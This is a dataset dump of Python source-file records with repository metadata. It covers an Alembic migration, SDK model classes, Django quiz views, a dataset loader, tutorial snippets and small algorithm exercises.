| Column | Type | Range / values |
|---|---|---|
| blob_id | string | lengths 40 to 40 |
| directory_id | string | lengths 40 to 40 |
| path | string | lengths 3 to 288 |
| content_id | string | lengths 40 to 40 |
| detected_licenses | list | lengths 0 to 112 |
| license_type | string | 2 classes |
| repo_name | string | lengths 5 to 115 |
| snapshot_id | string | lengths 40 to 40 |
| revision_id | string | lengths 40 to 40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 to 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 to 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 to 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k to 681M (nullable) |
| star_events_count | int64 | 0 to 209k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 to 2023-09-14 21:59:50 (nullable) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 to 2023-08-21 12:35:19 (nullable) |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 to 12.7k |
| extension | string | 142 classes |
| content | string | lengths 128 to 8.19k |
| authors | list | lengths 1 to 1 |
| author_id | string | lengths 1 to 132 |

Each record below repeats these fields in this order, separated by `|`, with the raw file content inline.
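As a minimal sketch of working with rows in this schema, assuming the dump was exported from a dataset on the Hugging Face Hub (the identifier `org/python-code-dump` is a placeholder, not the real dataset name), the metadata columns can be streamed and filtered with the `datasets` library:

```python
# Sketch only: "org/python-code-dump" is a hypothetical dataset id standing in
# for whichever dataset this dump was exported from.
from datasets import load_dataset

rows = load_dataset("org/python-code-dump", split="train", streaming=True)

for row in rows:
    # Each column in the schema above is exposed as a plain dict key.
    if row["license_type"] == "permissive" and row["length_bytes"] < 2000:
        print(row["repo_name"], row["path"], row["detected_licenses"])
```

Streaming avoids materializing the full split before the license and size filters are applied.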
b3a796f6f6e1d72469e523177fe6e9c9ac1fb9ff
|
94d5ef47d3244950a0308c754e0aa55dca6f2a0e
|
/migrations/versions/53e2ad0d34e3_added_produce_id_to_breed_table_instead.py
|
977835fba4e07675a127bd13b29394f31d921a8f
|
[] |
no_license
|
MUMT-IT/mis2018
|
9cbc7191cdc1bcd7e0c2de1e0586d8bd7b26002e
|
69fabc0b16abfeba44173caa93d4f63fa79033fd
|
refs/heads/master
| 2023-08-31T16:00:51.717449
| 2023-08-31T11:30:13
| 2023-08-31T11:30:13
| 115,810,883
| 5
| 5
| null | 2023-09-14T10:08:35
| 2017-12-30T17:06:00
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
"""added produce_id to breed table instead
Revision ID: 53e2ad0d34e3
Revises: e4f15449eb31
Create Date: 2018-02-03 22:51:38.297350
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '53e2ad0d34e3'
down_revision = 'e4f15449eb31'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('food_produce_breeds', sa.Column('produce_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'food_produce_breeds', 'food_produces', ['produce_id'], ['id'])
op.drop_constraint(u'food_produces_produce_breed_id_fkey', 'food_produces', type_='foreignkey')
op.drop_column('food_produces', 'produce_breed_id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('food_produces', sa.Column('produce_breed_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.create_foreign_key(u'food_produces_produce_breed_id_fkey', 'food_produces', 'food_produce_breeds', ['produce_breed_id'], ['id'])
op.drop_constraint(None, 'food_produce_breeds', type_='foreignkey')
op.drop_column('food_produce_breeds', 'produce_id')
# ### end Alembic commands ###
|
[
"likit.pre@mahidol.edu"
] |
likit.pre@mahidol.edu
|
3124b674fa821716127a4d34ee60d1afc948da96
|
7000895fad6f4c23084122ef27b3292d5e57df9f
|
/src/xrd/crypto/Qryptonight.py
|
1475f988d07b1c8d0513eab0742c2dab0685602f
|
[
"MIT"
] |
permissive
|
jack3343/xrd-core
|
1302cefe2a231895a53fcef73e558cdbc1196884
|
48a6d890d62485c627060b017eadf85602268caf
|
refs/heads/master
| 2022-12-15T07:36:16.618507
| 2020-08-27T09:21:36
| 2020-08-27T09:21:36
| 290,652,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,140
|
py
|
# coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
import threading
from xrd.core import config
from xrd.core.Singleton import Singleton
from xrd.crypto.Qryptonight7 import Qryptonight7
from xrd.crypto.QRandomX import QRandomX
class Qryptonight(object, metaclass=Singleton):
def __init__(self):
self.lock = threading.Lock()
self._qryptonight_7 = Qryptonight7()
self._qrandom_x = QRandomX()
def get_qn(self, block_number):
if block_number < config.dev.hard_fork_heights[0]:
return self._qryptonight_7
else:
return self._qrandom_x
def get_seed_height(self, block_number):
return self._qrandom_x.get_seed_height(block_number)
def hash(self, block_number, seed_height, seed_hash, blob):
with self.lock:
if block_number < config.dev.hard_fork_heights[0]:
return bytes(self._qryptonight_7.hash(blob))
else:
return bytes(self._qrandom_x.hash(block_number, seed_height, seed_hash, blob))
|
[
"70303530+jack3343@users.noreply.github.com"
] |
70303530+jack3343@users.noreply.github.com
|
d3407c1815d554881ce33812bf3dfc89430fe36f
|
2521e6427a7668d8cc91eabb368a5cf0eb7310f9
|
/Cap18-Extras/09_dimensionar.py
|
5872547aa4d77143e41c6c59a3c7fd24ab1da260
|
[] |
no_license
|
frclasso/turma3_Python1_2018
|
4a7bc0ba0eb538100400c15fc5c5b3ac1eeb7e50
|
47cd3aaa6828458b7f5164a8bce717bb8dd83a7c
|
refs/heads/master
| 2020-04-06T16:18:00.889198
| 2019-06-10T15:11:32
| 2019-06-10T15:11:32
| 157,614,408
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 284
|
py
|
#!/usr/bin/env python3
import openpyxl
wb = openpyxl.Workbook()
#print(wb.sheetnames)
sheet = wb.active
sheet['A1'] = 'Tall row'
sheet['B2'] = 'Wide column'
sheet.row_dimensions[1].height = 70
sheet.column_dimensions['B'].width = 50
wb.save('dimensions.xlsx')
print('Feito...')
|
[
"frcalsso@yahoo.com.br"
] |
frcalsso@yahoo.com.br
|
1bb77fc8dacaeb560a91eefb770e6455bfb58186
|
add0bb7a309ea346614d7f560a24e653d3d0ff67
|
/Python多线程/多线程.py
|
141bbbb34bec2b4895f11d7847ae4c8244b89526
|
[] |
no_license
|
1572903465/PythonProjects
|
935aff08d5b3d3f146393764a856369061513d36
|
73576080174f72ea1df9b36d201cf3949419041b
|
refs/heads/master
| 2023-06-10T15:50:49.178112
| 2021-07-05T15:42:53
| 2021-07-05T15:42:53
| 301,328,267
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 801
|
py
|
import time
import threading
# The GIL is a mechanism the interpreter uses to synchronize threads.
# It means only one thread executes at any given moment (even on a multi-core processor).
# Interpreters that use a GIL only allow one thread to run at a time.
# Common interpreters with a GIL are CPython and Ruby MRI.
# If you use JPython there is no GIL lock.
# CPU-bound multithreading
def start():  # pure computation that burns CPU time; no practical purpose
    data = 0
    for _ in range(10000000):  # keep adding
        data += 1
    return
if __name__ == "__main__":
    time_data = time.time()
    ts = {}
    for i in range(10):
        t = threading.Thread(target=start)  # pass the function object to target, without parentheses
        t.start()
        ts[i] = t  # a brand-new thread
    for i in range(10):
        ts[i].join()
    print(time.time() - time_data)
|
[
"1572903465@qq.com"
] |
1572903465@qq.com
|
8a9f2c084e5fbff4425c903743db38ff3e08f6e7
|
e7d1e06b5686f87280db292863b34ce0ea530d94
|
/src/examples/func_local.py
|
151515b33e59143e74c36eb6b6361a128c4ad393
|
[] |
no_license
|
tobereborn/byte-of-python2
|
4e9abdb3c513f8b5aa3955873b7468ddb60c8883
|
c7e06be6f246dc6292780d59de0806b19c086943
|
refs/heads/master
| 2021-01-12T04:25:00.536489
| 2017-02-07T02:06:23
| 2017-02-07T02:06:23
| 77,606,492
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 213
|
py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
'''
Created on Dec 31, 2016
@author: weizhen
'''
def func(x):
    print 'Local x is', x
    x = 2
    print 'Change local x to', x
x = 50
func(x)
print 'x is still', x
|
[
"none"
] |
none
|
5725565c8233d54c532088ebda905dca10d51e65
|
9b64f0f04707a3a18968fd8f8a3ace718cd597bc
|
/huaweicloud-sdk-servicestage/huaweicloudsdkservicestage/v2/model/create_o_auth_request.py
|
6759129234f47c48a4eb8652297aba7bde7df202
|
[
"Apache-2.0"
] |
permissive
|
jaminGH/huaweicloud-sdk-python-v3
|
eeecb3fb0f3396a475995df36d17095038615fba
|
83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b
|
refs/heads/master
| 2023-06-18T11:49:13.958677
| 2021-07-16T07:57:47
| 2021-07-16T07:57:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,107
|
py
|
# coding: utf-8
import re
import six
class CreateOAuthRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'repo_type': 'str',
'tag': 'str',
'body': 'OAuth'
}
attribute_map = {
'repo_type': 'repo_type',
'tag': 'tag',
'body': 'body'
}
def __init__(self, repo_type=None, tag=None, body=None):
"""CreateOAuthRequest - a model defined in huaweicloud sdk"""
self._repo_type = None
self._tag = None
self._body = None
self.discriminator = None
self.repo_type = repo_type
if tag is not None:
self.tag = tag
if body is not None:
self.body = body
@property
def repo_type(self):
"""Gets the repo_type of this CreateOAuthRequest.
Repository type. Repository types that support OAuth authorization: github, gitlab, gitee, bitbucket.
:return: The repo_type of this CreateOAuthRequest.
:rtype: str
"""
return self._repo_type
@repo_type.setter
def repo_type(self, repo_type):
"""Sets the repo_type of this CreateOAuthRequest.
Repository type. Repository types that support OAuth authorization: github, gitlab, gitee, bitbucket.
:param repo_type: The repo_type of this CreateOAuthRequest.
:type: str
"""
self._repo_type = repo_type
@property
def tag(self):
"""Gets the tag of this CreateOAuthRequest.
Site tag. For example, the international site uses ?tag=intl. Empty by default.
:return: The tag of this CreateOAuthRequest.
:rtype: str
"""
return self._tag
@tag.setter
def tag(self, tag):
"""Sets the tag of this CreateOAuthRequest.
Site tag. For example, the international site uses ?tag=intl. Empty by default.
:param tag: The tag of this CreateOAuthRequest.
:type: str
"""
self._tag = tag
@property
def body(self):
"""Gets the body of this CreateOAuthRequest.
:return: The body of this CreateOAuthRequest.
:rtype: OAuth
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this CreateOAuthRequest.
:param body: The body of this CreateOAuthRequest.
:type: OAuth
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CreateOAuthRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
e216c2feeb68eba1c8976b72040c3a84d2b3c578
|
e2ba1e3d001902e50f1dc9a63baf2a8abcac3ed8
|
/InnerEye-DataQuality/InnerEyeDataQuality/datasets/nih_cxr.py
|
91776355375965f599295af3453238326df7cff1
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
RobinMarshall55/InnerEye-DeepLearning
|
81f52e7429f942e8c9845958d5b586e19e14e351
|
8495a2eec3903957e3e81f81a0d2ad842d41dfe2
|
refs/heads/main
| 2023-08-15T19:46:38.017713
| 2021-10-22T14:13:56
| 2021-10-22T14:13:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,929
|
py
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
from pathlib import Path
from typing import Callable, List, Optional, Tuple, Dict, Union
import PIL
from PIL import Image
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
NIH_TOTAL_SIZE = 112120
class NIHCXR(Dataset):
def __init__(self,
data_directory: str,
use_training_split: bool,
seed: int = 1234,
shuffle: bool = True,
transform: Optional[Callable] = None,
num_samples: int = None,
return_index: bool = True) -> None:
"""
Class for the full NIH ChestXray Dataset (112k images)
:param data_directory: the directory containing all training images from the dataset as well as the
Data_Entry_2017.csv file containing the dataset labels.
:param use_training_split: whether to return the training or the test split of the dataset.
:param seed: random seed to use for dataset creation
:param shuffle: whether to shuffle the dataset prior to splitting between validation and training
:param transform: a preprocessing function that takes a PIL image as input and returns a tensor
:param num_samples: number of samples to return (has to be smaller than the dataset split)
"""
self.data_directory = Path(data_directory)
if not self.data_directory.exists():
logging.error(
f"The data directory {self.data_directory} does not exist. Make sure to download the NIH data "
f"first. The dataset can be found on the main page "
"https://www.kaggle.com/nih-chest-xrays/data. Make sure all images are placed directly under the "
"data_directory folder. Make sure you downloaded the Data_Entry_2017.csv file to this directory as "
"well.")
self.train = use_training_split
self.seed = seed
self.random_state = np.random.RandomState(seed)
self.dataset_dataframe = pd.read_csv(self.data_directory / "Data_Entry_2017.csv")
self.dataset_dataframe["pneumonia_like"] = self.dataset_dataframe["Finding Labels"].apply(
lambda x: x.split("|")).apply(lambda x: "pneumonia" in x.lower()
or "infiltration" in x.lower()
or "consolidation" in x.lower())
self.transforms = transform
orig_labels = self.dataset_dataframe.pneumonia_like.values.astype(np.int64)
subjects_ids = self.dataset_dataframe["Image Index"].values
is_train_ids = self.dataset_dataframe["train"].values
self.num_classes = 2
self.indices = np.where(is_train_ids)[0] if use_training_split else np.where(~is_train_ids)[0]
self.indices = self.random_state.permutation(self.indices) \
if shuffle else self.indices
# ------------- Select subset of current split ------------- #
if num_samples is not None:
assert 0 < num_samples <= len(self.indices)
self.indices = self.indices[:num_samples]
self.subject_ids = subjects_ids[self.indices]
self.orig_labels = orig_labels[self.indices].reshape(-1)
self.targets = self.orig_labels
# Identify case ids for ambiguous and clear label noise cases
self.ambiguity_metric_args: Dict = dict()
dataset_type = "TRAIN" if use_training_split else "VAL"
logging.info(f"Proportion of positive labels - {dataset_type}: {np.mean(self.targets)}")
logging.info(f"Number samples - {dataset_type}: {self.targets.shape[0]}")
self.return_index = return_index
def __getitem__(self, index: int) -> Union[Tuple[int, PIL.Image.Image, int], Tuple[PIL.Image.Image, int]]:
"""
:param index: The index of the sample to be fetched
:return: The image and label tensors
"""
subject_id = self.subject_ids[index]
filename = self.data_directory / f"{subject_id}"
target = self.targets[index]
scan_image = Image.open(filename).convert("L")
if self.transforms is not None:
scan_image = self.transforms(scan_image)
if self.return_index:
return index, scan_image, int(target)
return scan_image, int(target)
def __len__(self) -> int:
"""
:return: The size of the dataset
"""
return len(self.indices)
def get_label_names(self) -> List[str]:
return ["NotPneunomiaLike", "PneunomiaLike"]
|
[
"noreply@github.com"
] |
RobinMarshall55.noreply@github.com
|
a9adbd9757605899cfcc24ab62f85a0506576082
|
9923e30eb99716bfc179ba2bb789dcddc28f45e6
|
/apimatic/python_generic_lib/Samsara+API-Python/samsaraapi/models/tag_1.py
|
c430f1f458ea4d2ca686481440b43d895aaab5a2
|
[
"MIT"
] |
permissive
|
silverspace/samsara-sdks
|
cefcd61458ed3c3753ac5e6bf767229dd8df9485
|
c054b91e488ab4266f3b3874e9b8e1c9e2d4d5fa
|
refs/heads/master
| 2020-04-25T13:16:59.137551
| 2019-03-01T05:49:05
| 2019-03-01T05:49:05
| 172,804,041
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,770
|
py
|
# -*- coding: utf-8 -*-
"""
samsaraapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class Tag1(object):
"""Implementation of the 'Tag1' model.
TODO: type model description here.
Attributes:
id (long|int): The ID of this tag.
name (string): Name of this tag.
parent_tag_id (long|int): The ID of this tag.
"""
# Create a mapping from Model property names to API property names
_names = {
"id":'id',
"name":'name',
"parent_tag_id":'parentTagId'
}
def __init__(self,
id=None,
name=None,
parent_tag_id=None):
"""Constructor for the Tag1 class"""
# Initialize members of the class
self.id = id
self.name = name
self.parent_tag_id = parent_tag_id
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
id = dictionary.get('id')
name = dictionary.get('name')
parent_tag_id = dictionary.get('parentTagId')
# Return an object of this model
return cls(id,
name,
parent_tag_id)
|
[
"greg@samsara.com"
] |
greg@samsara.com
|
22e0f4ddf70d8a6df31ef25ad3c9523dd8105a3a
|
ac89e5d51d0d15ffdecfde25985c28a2af9c2e43
|
/test/test_match_alliance.py
|
931bc1a9d817c762a45d35d742fc1774fbbb67f5
|
[] |
no_license
|
TBA-API/tba-api-client-python
|
20dc4a634be32926054ffc4c52b94027ee40ac7d
|
4f6ded8fb4bf8f7896891a9aa778ce15a2ef720b
|
refs/heads/master
| 2021-07-15T16:36:32.234217
| 2020-05-07T00:20:43
| 2020-05-07T00:20:43
| 134,112,743
| 4
| 8
| null | 2019-07-01T03:14:12
| 2018-05-20T02:13:45
|
Python
|
UTF-8
|
Python
| false
| false
| 1,191
|
py
|
# coding: utf-8
"""
The Blue Alliance API v3
# Overview Information and statistics about FIRST Robotics Competition teams and events. # Authentication All endpoints require an Auth Key to be passed in the header `X-TBA-Auth-Key`. If you do not have an auth key yet, you can obtain one from your [Account Page](/account). A `User-Agent` header may need to be set to prevent a 403 Unauthorized error. # noqa: E501
The version of the OpenAPI document: 3.04.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import tbaapiv3client
from tbaapiv3client.models.match_alliance import MatchAlliance # noqa: E501
from tbaapiv3client.rest import ApiException
class TestMatchAlliance(unittest.TestCase):
"""MatchAlliance unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testMatchAlliance(self):
"""Test MatchAlliance"""
# FIXME: construct object with mandatory attributes with example values
# model = tbaapiv3client.models.match_alliance.MatchAlliance() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"travis@example.org"
] |
travis@example.org
|
8f152a314ef63e887d0f8e569075306ee1396908
|
4ae3b27a1d782ae43bc786c841cafb3ace212d55
|
/Test_Slen/Pytest_proj/01/Scripts/rst2latex.py
|
61137b0e6f44ef69c8780b8663fadf71a62bbb4b
|
[] |
no_license
|
bopopescu/Py_projects
|
c9084efa5aa02fd9ff6ed8ac5c7872fedcf53e32
|
a2fe4f198e3ca4026cf2e3e429ac09707d5a19de
|
refs/heads/master
| 2022-09-29T20:50:57.354678
| 2020-04-28T05:23:14
| 2020-04-28T05:23:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
#!c:\users\jsun\documents\py_projects\pytest_proj\01\scripts\python.exe
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates LaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='latex', description=description)
|
[
"sunusd@yahoo.com"
] |
sunusd@yahoo.com
|
9baf84a3f128fbdc8787947c099b5f83b777bbc7
|
1285703d35b5a37734e40121cd660e9c1a73b076
|
/aizu_online_judge/tree/7_d_solution.py
|
70efa80577b60594e3d0ffb0dedc8489925e85a8
|
[] |
no_license
|
takin6/algorithm-practice
|
21826c711f57131108168775f08e4e13d07a3b38
|
f4098bea2085a77d11c29e1593b3cc3f579c24aa
|
refs/heads/master
| 2022-11-30T09:40:58.083766
| 2020-08-07T22:07:46
| 2020-08-07T22:07:46
| 283,609,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 985
|
py
|
class Node():
def __init__(self, parent = -1, left = -1, right = -1):
self.parent = parent
self.left = left
self.right = right
def postorder(ns, i, post):
if ns[i].left != -1:
postorder(ns, ns[i].left, post)
if ns[i].right != -1:
postorder(ns, ns[i].right, post)
post.append(str(i + 1))
def poio_node(ns, po, io):
p = po[0]
i = io.index(p)
if i != 0:
ns[p].left = po[1]
ns[po[1]].parent = p
poio_node(ns, po[1:i + 1], io[:i])
if i != len(io) -1:
ns[p].right = po[i + 1]
ns[po[1 + i]].parent = p
poio_node(ns, po[i + 1:], io[i + 1:])
def min1(n):
return n - 1
n = int(input())
po = list(map(int, input().split()))
io = list(map(int, input().split()))
po = list(map(min1, po))
io = list(map(min1, io))
ns = [Node() for i in range(n)]
poio_node(ns, po, io)
post = []
postorder(ns, po[0], post)
print(" ".join(post))
|
[
"takayukiinoue116@gmail.com"
] |
takayukiinoue116@gmail.com
|
cd8c39eff00b00f3071855b64494d6159d08584a
|
45b64f620e474ac6d6b2c04fbad2730f67a62b8e
|
/Varsity-Final-Project-by-Django-master/.history/project/quiz/views_20210423112204.py
|
7280d320c23c7ccb25ba0eff899768fde6d05502
|
[] |
no_license
|
ashimmitra/Final-Project
|
99de00b691960e25b1ad05c2c680015a439277e0
|
a3e1d3c9d377e7b95b3eaf4dbf757a84a3858003
|
refs/heads/master
| 2023-04-11T06:12:35.123255
| 2021-04-26T15:41:52
| 2021-04-26T15:41:52
| 361,796,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 974
|
py
|
from django.shortcuts import render
from quiz.models import Quiz
from quiz.models import Bangla
from quiz.models import Math
from quiz.models import Science
from quiz.models import GK
#def welcome(request):
#return render(request, 'welcome.html')
def english(request):
questions = Quiz.objects.all()
return render(request, 'english.html', { 'questions': questions})
def bangla(request):
questions = Bangla.objects.all()
return render(request, 'bangla.html', { 'questions': questions})
def math(request):
questions = Math.objects.all()
return render(request, 'math.html', { 'questions': questions})
def science(request):
questions = Science.objects.all()
return render(request, 'science.html', { 'questions': questions})
def generalknowledge(request):
questions = GK.objects.all()
return render(request, 'generalknowledge.html', { 'questions': questions})
def result(request):
return render(request, 'result.html')
|
[
"34328617+ashimmitra@users.noreply.github.com"
] |
34328617+ashimmitra@users.noreply.github.com
|
c0ecc3296cd811fe782785ac56a926a7383d5c13
|
128b3bb5e5e3797ea73b8d71ec479b02d2d02b75
|
/py/h2o_nodes.py
|
55df64bb6144d92806a795cb08cbf9c422050764
|
[
"Apache-2.0"
] |
permissive
|
JerryZhong/h2o
|
14819b044466dffe4ec461cb154898610f6be8b3
|
c8ce6d223786673b5baf28f26d653bf4bd9f4ba9
|
refs/heads/master
| 2021-01-17T10:12:35.547837
| 2014-11-07T11:05:47
| 2014-11-07T11:05:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 292
|
py
|
# does the globally visible update behavior on these depend on them being mutables?
# to get rid of circular imports
# should think of managing this differently
print "h2o_nodes"
nodes = []
# used to get a browser pointing to the last RFview
global json_url_history
json_url_history = []
|
[
"kevin@0xdata.com"
] |
kevin@0xdata.com
|
ccedc17ba5f223b2b46ee55cbe835f9f835c7af1
|
2cf1f60d5adcc9fe56366e26b95860a440bcb230
|
/Previous Year CodeVita/Travel_Cost.py
|
3818cb399113612f5e097dfbda7f072ec2e90394
|
[] |
no_license
|
rohanJa/DSA_IMP
|
619a7b5c89b55cbff3c77b265242c05ebedd6140
|
b0ead018814d53a00cc47cda1915ad0dfe5c30dc
|
refs/heads/master
| 2022-12-23T22:56:32.775027
| 2020-09-01T06:52:25
| 2020-09-01T06:52:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 463
|
py
|
import heapq
N = int(input())
cities = list(map(int, input().split(' ')))
M = int(input())
if(len(cities)<=1 or cities[-1]==-1):
    print(-1)
else:
    cost = cities[0] + cities[-1]
    cities = cities[1:len(cities)-1]
    heapq.heapify(cities)
    for i in range(0,len(cities)):
        if(cities[i]==-1):
            M-=1
        else:
            cost+=cities[i]
    if(M<0):
        print(-1)
    else:
        print(cost - sum(heapq.nlargest(M,cities)))
|
[
"pkopergaonkar@gmail.com"
] |
pkopergaonkar@gmail.com
|
741f4f977054d674b6570a9cbd439392f1bdf378
|
c8a0f1ee8ca4b27d6b71e1a358f950a5f168b953
|
/Sessão 4/Atributos de classe/Encapsulamento.py
|
cf204b06b1de3f55ff1b2bc2ec9d5e83d5a6d641
|
[] |
no_license
|
natanaelfelix/Estudos
|
0c3a54903a5ac457c1c1cfbdc22202683c46b62c
|
10b33fa7cb8521d63ea6a14c04894a5f7e86ee0c
|
refs/heads/master
| 2022-12-16T12:07:45.088305
| 2020-09-19T19:56:07
| 2020-09-19T19:56:07
| 296,936,330
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,553
|
py
|
# hiding code in Python (encapsulation)
'''
public    # methods and attributes can be accessed inside and outside the class
protected # attributes that can be accessed only inside the class or in its child classes
private   # attribute or method is only available inside the class
In Python:
this is handled by convention
_  = treated as private, a weaker form of protected
__ = treated as private, meaning it should not be used from outside under any circumstance
To access the real private attribute:
(instance._ClassName__attribute_name)
# all of this exists to protect the application
'''
class BaseDeDados:
    def __init__(self):
        # self.dados = {}  # this one is public, accessible from inside and outside the class; changing its value from outside breaks the whole class
        # self.__dados = {}  # a leading _ marks the name as private by convention, so we should not use it from outside
        self.__dados = {}  # with a double __ it cannot be used from outside; assigning to it from outside just creates a different attribute
    def inserir_cliente(self, id, nome):
        if 'clientes' not in self.__dados:
            self.__dados['clientes'] = {id: nome}
        else:
            self.__dados['clientes'].update({id: nome})
    def lista_clientes(self):
        for id, nome in self.__dados['clientes'].items():
            print(id, nome)
    def apaga_cliente(self, id):
        del self.__dados['clientes'][id]
bd = BaseDeDados()
bd.inserir_cliente(1, 'Adriano')
bd.inserir_cliente(2, 'Ronaldo')
bd.inserir_cliente(3, 'Priscila')
bd.apaga_cliente(2)
bd.lista_clientes()
print(bd.__dados)  # raises AttributeError: name mangling stores the attribute as _BaseDeDados__dados
|
[
"natanaelmartinsfelix@hotmail.com"
] |
natanaelmartinsfelix@hotmail.com
|
597dd8723ef677cd5e0dad4d6aa1daa7d951b79b
|
6d4a7f3f069e68a984df61b718e39597370a1131
|
/main/getmail
|
0b93cfc2d2cab97af7695d7546feb81af95b343b
|
[] |
no_license
|
nabiuddin6/scripts-1
|
d7c32a483c1ed4fcca2df3d68bf29cabf81f69c7
|
7a36fa22cfc369ccc5038332f95779370b12507c
|
refs/heads/master
| 2022-09-01T07:14:31.211758
| 2020-05-30T19:20:02
| 2020-05-30T19:20:02
| 270,788,454
| 1
| 0
| null | 2020-06-08T18:55:19
| 2020-06-08T18:55:18
| null |
UTF-8
|
Python
| false
| false
| 158
|
#!/usr/bin/env python3
from fileinput import input as finput
with open("/tmp/mymail.txt", "w") as f:
for line in finput():
print(line, file=f)
|
[
"bryanbugyi34@gmail.com"
] |
bryanbugyi34@gmail.com
|
|
847d6cf04f173be81615f171ab5efce76b4cb626
|
7b5828edda7751700ca7002b40a214e39e5f48a8
|
/EA/core/sims4/localization/localization_validation.py
|
2a309a8565c9d42b05bb9dcda2a6797caada7ad5
|
[] |
no_license
|
daniela-venuta/Sims-4-Python-Script-Workspace
|
54c33dac02f84daed66f46b7307f222fede0fa62
|
f408b28fb34626b2e3b2953152343d591a328d66
|
refs/heads/main
| 2023-03-29T18:08:39.202803
| 2021-03-30T19:00:42
| 2021-03-30T19:00:42
| 353,111,243
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,400
|
py
|
from protocolbuffers.Localization_pb2 import LocalizedStringToken
import sims4.log
import sims4.reload
logger = sims4.log.Logger('Localization', default_owner='epanero')
with sims4.reload.protected(globals()):
_localized_string_validators = {}
def register_localized_string_validator(validator_gen):
key = validator_gen.__module__ + validator_gen.__qualname__
_localized_string_validators[key] = validator_gen
def get_all_strings_to_validate_gen():
for validator_gen in _localized_string_validators.values():
try:
for localized_string_msg in validator_gen():
if localized_string_msg.hash:
yield localized_string_msg
except Exception as ex:
logger.error('Validator {} threw an exception: {}', validator_gen, ex)
class _LocalizationValidatorPlaceholderSim:
def __init__(self, is_female=False):
self._first_name = 'Jane' if is_female else 'John'
self._last_name = 'Doe'
self._is_female = is_female
def populate_localization_token(self, token):
token.type = LocalizedStringToken.SIM
token.first_name = self._first_name
token.last_name = self._last_name
token.is_female = self._is_female
def get_random_localization_token_sim(*args, **kwargs):
return _LocalizationValidatorPlaceholderSim(*args, **kwargs)
|
[
